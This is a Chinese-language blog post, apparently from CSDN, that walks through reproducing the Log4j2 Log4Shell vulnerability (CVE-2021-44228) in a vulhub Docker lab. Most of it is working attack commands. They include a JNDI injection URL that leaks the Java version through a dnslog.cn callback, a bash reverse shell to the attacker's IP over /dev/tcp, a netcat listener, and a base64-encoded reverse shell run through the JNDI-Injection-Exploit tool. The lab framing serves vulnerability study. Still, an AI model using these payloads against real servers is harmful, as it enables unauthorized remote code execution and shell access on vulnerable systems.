[CVE-2021-44228]:log4j2漏洞复现流程详解(vulhub环境)

本文详细描述了ApacheLog4j2中的CVE-2021-44228漏洞利用过程,包括如何通过JNDI注入执行任意代码,以及在靶机和攻击机之间进行的docker环境配置和漏洞利用工具的使用,展示了漏洞的渗透成功案例。
摘要由CSDN通过智能技术生成

CVE-2021-44228漏洞复现

漏洞简介

Apache Log4j2是Apache软件基金会下的一个开源的基于java的日志记录工具。该远程代码执行漏洞基于攻击者使用${}关键标识触发JNDI注入漏洞,可以执行任意代码。

漏洞复现

靶机:192.168.74.150
攻击机:192.168.74.148

启动docker

在这里插入图片描述

docker-compose 

在这里插入图片描述

docker ps

查看docker所在进程,如图所示
在这里插入图片描述
在kali火狐浏览器中打开,显示此界面为成功

在这里插入图片描述
获得一个临时的DNS这里是网站
在这里插入图片描述

在浏览器中输入 http://192.168.74.150:5005/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.armp2a.dnslog.cn}

在这里插入图片描述
如图,成功回显java版本号
在这里插入图片描述

在攻击机中下载注入工具 git clone https://github.com/bkfish/Apache-Log4j-Learning.git

在这里插入图片描述

bash -i >& /dev/tcp/192.168.74.148/19999 0>&1

在这里插入图片描述

在攻击机上开启端口监听 nc -lvvp 19999

在这里插入图片描述

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc0LjE0OC8xOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.74.148"
#直接运行并在攻击机中开启监听

在这里插入图片描述

http://192.168.74.150:8983/solr/admin/cores?action=${jndi:ldap://192.168.74.148:1389/jas9lj}

随机选择一个直接使用即可

在这里插入图片描述
如图即表示渗透成功!

养成好习惯,用完记得关闭:docker-compose down

待完善…

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值